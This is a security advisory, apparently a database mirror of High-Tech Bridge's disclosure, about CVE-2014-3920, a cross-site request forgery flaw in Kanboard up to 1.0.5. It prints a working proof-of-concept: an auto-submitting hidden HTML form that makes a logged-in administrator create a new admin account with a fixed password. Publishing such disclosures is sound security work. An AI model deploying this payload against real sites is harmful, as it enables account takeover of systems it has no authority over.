Lucene search

K
htbridgeHigh-Tech BridgeHTB23217
HistoryMay 28, 2014 - 12:00 a.m.

Cross-Site Request Forgery (CSRF) in Kanboard

2014-05-2800:00:00
High-Tech Bridge
www.htbridge.com
39

0.004 Low

EPSS

Percentile

73.8%

High-Tech Bridge Security Research Lab discovered vulnerability in Kanboard, which can be exploited to perform Сross-Site Request Forgery (CSRF) attacks and gain complete control over the vulnerable application.

1. Сross-Site Request Forgery (CSRF) in Kanboard: CVE-2014-3920

The vulnerability exists due to insufficient verification of the HTTP request origin. A remote attacker can trick a logged-in administrator of Kanboard to visit a specially crafted web page with CSRF exploit code and create new account with administrative privileges.

Simple CSRF exploit below creates new admin account with login “immuniweb” and password “password”:

<form action=“http://kanboard/?controller=user&amp;action=save” method=“post” name=“main”>
<input type=“hidden” name=“username” value=“immuniweb”>
<input type=“hidden” name=“name” value=“name”>
<input type=“hidden” name=“email” value="[email protected]">
<input type=“hidden” name=“password” value=“password”>
<input type=“hidden” name=“confirmation” value=“password”>
<input type=“hidden” name=“default_project_id” value=“0”>
<input type=“hidden” name=“is_admin” value=“1”>
<input type=“submit” id=“btn”>
</form>
<script>
document.main.submit();
</script>

CPENameOperatorVersion
kanboardle1.0.5